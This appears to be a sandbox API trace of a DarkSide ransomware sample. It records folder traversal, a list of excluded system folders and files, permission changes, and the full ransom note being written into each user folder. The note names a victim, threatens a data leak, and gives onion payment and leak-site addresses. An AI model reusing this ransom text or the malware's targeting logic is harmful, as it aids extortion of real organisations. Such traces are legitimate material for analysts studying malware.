[0156.120] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.121] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.121] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0156.121] _wcsicmp (_Str1="backup", _Str2="_nLNF") returned 3 [0156.121] wcslen (_String="backup") returned 0x6 [0156.121] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.122] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.122] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.122] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0156.122] _wcsicmp (_Str1="backup", _Str2="Pictures") returned -14 [0156.122] wcslen (_String="backup") returned 0x6 [0156.122] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0156.123] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0156.123] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0156.123] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd67121c0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd67121c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd67121c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.123] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.123] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0156.123] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0156.123] _wcsicmp (_Str1="$recycle.bin", _Str2="Saved Games") returned -79 [0156.124] wcslen (_String="$recycle.bin") returned 0xc [0156.124] _wcsicmp (_Str1="config.msi", _Str2="Saved Games") returned -16 [0156.124] wcslen (_String="config.msi") returned 0xa [0156.124] _wcsicmp (_Str1="$windows.~bt", _Str2="Saved Games") returned -79 [0156.124] wcslen (_String="$windows.~bt") returned 0xc [0156.124] _wcsicmp (_Str1="$windows.~ws", _Str2="Saved Games") returned -79 [0156.124] wcslen (_String="$windows.~ws") returned 0xc [0156.124] _wcsicmp (_Str1="windows", _Str2="Saved Games") returned 4 [0156.124] wcslen (_String="windows") returned 0x7 [0156.124] _wcsicmp (_Str1="appdata", _Str2="Saved Games") returned -18 [0156.124] wcslen (_String="appdata") returned 0x7 [0156.124] _wcsicmp (_Str1="application data", _Str2="Saved Games") returned -18 [0156.124] wcslen (_String="application data") returned 0x10 [0156.124] _wcsicmp (_Str1="boot", _Str2="Saved Games") returned -17 [0156.124] wcslen (_String="boot") returned 0x4 [0156.124] _wcsicmp (_Str1="google", _Str2="Saved Games") returned -12 [0156.124] wcslen (_String="google") returned 0x6 [0156.124] _wcsicmp (_Str1="mozilla", _Str2="Saved Games") returned -6 [0156.124] wcslen (_String="mozilla") returned 0x7 [0156.124] _wcsicmp (_Str1="program files", _Str2="Saved Games") returned -3 [0156.124] wcslen (_String="program files") returned 0xd [0156.124] _wcsicmp (_Str1="program files (x86)", _Str2="Saved Games") returned -3 [0156.124] wcslen (_String="program files (x86)") returned 0x13 [0156.124] _wcsicmp (_Str1="programdata", _Str2="Saved Games") returned -3 [0156.124] wcslen (_String="programdata") returned 0xb [0156.124] _wcsicmp (_Str1="system volume information", _Str2="Saved Games") returned 24 [0156.124] wcslen (_String="system volume information") returned 0x19 [0156.124] _wcsicmp (_Str1="tor browser", _Str2="Saved Games") returned 1 [0156.124] wcslen (_String="tor browser") returned 0xb [0156.125] _wcsicmp (_Str1="windows.old", _Str2="Saved Games") returned 4 [0156.125] wcslen (_String="windows.old") returned 0xb [0156.125] _wcsicmp (_Str1="intel", _Str2="Saved Games") returned -10 [0156.125] wcslen (_String="intel") returned 0x5 [0156.125] _wcsicmp (_Str1="msocache", _Str2="Saved Games") returned -6 [0156.125] wcslen (_String="msocache") returned 0x8 [0156.125] _wcsicmp (_Str1="perflogs", _Str2="Saved Games") returned -3 [0156.125] wcslen (_String="perflogs") returned 0x8 [0156.125] _wcsicmp (_Str1="x64dbg", _Str2="Saved Games") returned 5 [0156.125] wcslen (_String="x64dbg") returned 0x6 [0156.125] _wcsicmp (_Str1="public", _Str2="Saved Games") returned -3 [0156.125] wcslen (_String="public") returned 0x6 [0156.125] _wcsicmp (_Str1="all users", _Str2="Saved Games") returned -18 [0156.125] wcslen (_String="all users") returned 0x9 [0156.125] _wcsicmp (_Str1="default", _Str2="Saved Games") returned -15 [0156.125] wcslen (_String="default") returned 0x7 [0156.125] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0156.125] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0156.125] wcscpy (in: _Dest=0x4480094, _Source="Saved Games" | out: _Dest="Saved Games") returned="Saved Games" [0156.125] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0156.125] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0156.126] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0156.126] GetNamedSecurityInfoW () returned 0x0 [0156.126] SetEntriesInAclW () returned 0x0 [0156.126] SetNamedSecurityInfoW () returned 0x0 [0156.128] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58558) returned 1 [0156.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.128] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games")) returned 1 [0156.128] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.128] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.129] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.129] CloseHandle (hObject=0x678) returned 1 [0156.130] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games")) returned 0x11 [0156.130] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="" [0156.130] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 0x2e [0156.130] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0156.130] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbad47e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbad47e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.131] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.131] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0156.131] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0156.131] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0156.131] wcslen (_String="autorun.inf") returned 0xb [0156.131] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0156.131] wcslen (_String="boot.ini") returned 0x8 [0156.131] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0156.131] wcslen (_String="bootfont.bin") returned 0xc [0156.131] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0156.131] wcslen (_String="bootsect.bak") returned 0xc [0156.131] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0156.131] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbad47e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbad47e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbad47e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.131] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.131] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.131] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0156.131] _wcsicmp (_Str1="backup", _Str2="Saved Games") returned -17 [0156.131] wcslen (_String="backup") returned 0x6 [0156.131] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0156.132] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0156.132] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0156.132] _wcsicmp (_Str1="$recycle.bin", _Str2="Searches") returned -79 [0156.132] wcslen (_String="$recycle.bin") returned 0xc [0156.132] _wcsicmp (_Str1="config.msi", _Str2="Searches") returned -16 [0156.132] wcslen (_String="config.msi") returned 0xa [0156.132] _wcsicmp (_Str1="$windows.~bt", _Str2="Searches") returned -79 [0156.132] wcslen (_String="$windows.~bt") returned 0xc [0156.132] _wcsicmp (_Str1="$windows.~ws", _Str2="Searches") returned -79 [0156.132] wcslen (_String="$windows.~ws") returned 0xc [0156.132] _wcsicmp (_Str1="windows", _Str2="Searches") returned 4 [0156.132] wcslen (_String="windows") returned 0x7 [0156.132] _wcsicmp (_Str1="appdata", _Str2="Searches") returned -18 [0156.132] wcslen (_String="appdata") returned 0x7 [0156.132] _wcsicmp (_Str1="application data", _Str2="Searches") returned -18 [0156.132] wcslen (_String="application data") returned 0x10 [0156.132] _wcsicmp (_Str1="boot", _Str2="Searches") returned -17 [0156.132] wcslen (_String="boot") returned 0x4 [0156.133] _wcsicmp (_Str1="google", _Str2="Searches") returned -12 [0156.133] wcslen (_String="google") returned 0x6 [0156.133] _wcsicmp (_Str1="mozilla", _Str2="Searches") returned -6 [0156.133] wcslen (_String="mozilla") returned 0x7 [0156.133] _wcsicmp (_Str1="program files", _Str2="Searches") returned -3 [0156.133] wcslen (_String="program files") returned 0xd [0156.133] _wcsicmp (_Str1="program files (x86)", _Str2="Searches") returned -3 [0156.133] wcslen (_String="program files (x86)") returned 0x13 [0156.133] _wcsicmp (_Str1="programdata", _Str2="Searches") returned -3 [0156.133] wcslen (_String="programdata") returned 0xb [0156.133] _wcsicmp (_Str1="system volume information", _Str2="Searches") returned 20 [0156.133] wcslen (_String="system volume information") returned 0x19 [0156.133] _wcsicmp (_Str1="tor browser", _Str2="Searches") returned 1 [0156.133] wcslen (_String="tor browser") returned 0xb [0156.133] _wcsicmp (_Str1="windows.old", _Str2="Searches") returned 4 [0156.133] wcslen (_String="windows.old") returned 0xb [0156.133] _wcsicmp (_Str1="intel", _Str2="Searches") returned -10 [0156.133] wcslen (_String="intel") returned 0x5 [0156.133] _wcsicmp (_Str1="msocache", _Str2="Searches") returned -6 [0156.133] wcslen (_String="msocache") returned 0x8 [0156.133] _wcsicmp (_Str1="perflogs", _Str2="Searches") returned -3 [0156.133] wcslen (_String="perflogs") returned 0x8 [0156.133] _wcsicmp (_Str1="x64dbg", _Str2="Searches") returned 5 [0156.133] wcslen (_String="x64dbg") returned 0x6 [0156.133] _wcsicmp (_Str1="public", _Str2="Searches") returned -3 [0156.133] wcslen (_String="public") returned 0x6 [0156.133] _wcsicmp (_Str1="all users", _Str2="Searches") returned -18 [0156.133] wcslen (_String="all users") returned 0x9 [0156.133] _wcsicmp (_Str1="default", _Str2="Searches") returned -15 [0156.133] wcslen (_String="default") returned 0x7 [0156.133] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0156.133] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0156.133] wcscpy (in: _Dest=0x4480094, _Source="Searches" | out: _Dest="Searches") returned="Searches" [0156.133] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0156.133] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0156.134] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0156.134] GetNamedSecurityInfoW () returned 0x0 [0156.134] SetEntriesInAclW () returned 0x0 [0156.134] SetNamedSecurityInfoW () returned 0x0 [0156.137] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d585f8) returned 1 [0156.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.137] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 1 [0156.137] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.137] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.137] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.138] CloseHandle (hObject=0x678) returned 1 [0156.139] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0156.139] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="" [0156.139] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 0x2b [0156.139] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0156.139] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbad47e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbad47e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.140] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.140] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0156.140] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0156.140] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0156.140] wcslen (_String="autorun.inf") returned 0xb [0156.140] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0156.140] wcslen (_String="boot.ini") returned 0x8 [0156.140] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0156.140] wcslen (_String="bootfont.bin") returned 0xc [0156.140] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0156.140] wcslen (_String="bootsect.bak") returned 0xc [0156.140] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 